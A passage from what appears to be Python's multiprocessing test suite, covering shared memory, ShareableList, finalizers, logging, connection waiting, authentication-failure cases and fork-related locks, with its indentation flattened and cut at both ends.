b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def _new_shm_name(self, prefix):
# Add a PID to the name of a POSIX shared memory object to allow
# running multiprocessing tests (test_multiprocessing_fork,
# test_multiprocessing_spawn, etc) in parallel.
return prefix + str(os.getpid())
def test_shared_memory_basics(self):
name_tsmb = self._new_shm_name('test01_tsmb')
sms = shared_memory.SharedMemory(name_tsmb, create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, name_tsmb)
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Verify __repr__
self.assertIn(sms.name, str(sms))
self.assertIn(str(sms.size), str(sms))
# Test pickling
sms.buf[0:6] = b'pickle'
pickled_sms = pickle.dumps(sms)
sms2 = pickle.loads(pickled_sms)
self.assertEqual(sms.name, sms2.name)
self.assertEqual(bytes(sms.buf[0:6]), bytes(sms2.buf[0:6]), b'pickle')
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory(name_tsmb)
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory(name_tsmb, size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = [self._new_shm_name('test01_fn'), self._new_shm_name('test02_fn')]
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
name_dblunlink = self._new_shm_name('test01_dblunlink')
sms_uno = shared_memory.SharedMemory(
name_dblunlink,
create=True,
size=5000
)
with self.assertRaises(FileNotFoundError):
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory(name_dblunlink)
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
name_tsmb,
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory(name_tsmb)
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
# Test creating a shared memory segment with negative size
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=-1)
# Test creating a shared memory segment with size 0
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=0)
# Test creating a shared memory segment without size argument
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True)
def test_shared_memory_across_processes(self):
# bpo-40135: don't define shared memory block's name in case of
# the failure when we run multiprocessing tests in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify __repr__
self.assertIn(sl.shm.name, str(sl))
self.assertIn(str(list(sl)), str(sl))
# Index Out of Range (get)
with self.assertRaises(IndexError):
sl[7]
# Index Out of Range (set)
with self.assertRaises(IndexError):
sl[7] = 2
# Assign value without format change (str -> str)
current_format = sl._get_packing_format(0)
sl[0] = 'howdy'
self.assertEqual(current_format, sl._get_packing_format(0))
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
name_duplicate = self._new_shm_name('test03_duplicate')
sl_copy = shared_memory.ShareableList(sl, name=name_duplicate)
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual(name_duplicate, sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
